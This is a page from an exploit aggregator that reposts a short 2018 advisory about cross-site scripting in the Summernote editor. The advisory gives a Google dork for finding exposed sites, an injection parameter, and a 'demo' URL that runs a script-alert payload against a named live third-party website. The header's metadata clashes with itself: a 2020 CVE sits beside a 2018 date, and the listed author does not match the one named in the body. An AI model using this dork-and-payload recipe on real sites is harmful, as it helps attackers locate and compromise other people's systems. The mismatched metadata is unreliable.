Advertisement






Summernote Cross Site Scripting ( XSS ) Vulnerability

CVE Category Price Severity
CVE-2020-5648 CWE-79 $500 High
Author Risk Exploitation Type Date
John Doe Critical Remote 2018-10-15
CPE
cpe:cpe:/a:summernote:summernote
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 0.6722 0.98477

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100125

Below is a copy:

Summernote Cross Site Scripting ( XSS ) Vulnerability
***************************************************
# Exploit Title: Summernote Cross Site Scripting ( XSS ) Vulnerability
# Google Dork: inurl:/summernote.php editor
# Exploit: ?page=xss
# Vendor: https://summernote.org/
# Date: 14/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with ?page=xss
***************************************************
[+] Demo Site
[+] https://mondhygieniste.com/summernote.php?page=<script>alert("XSS")</script>
***************************************************
Thanks To Indonesia To World Team

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum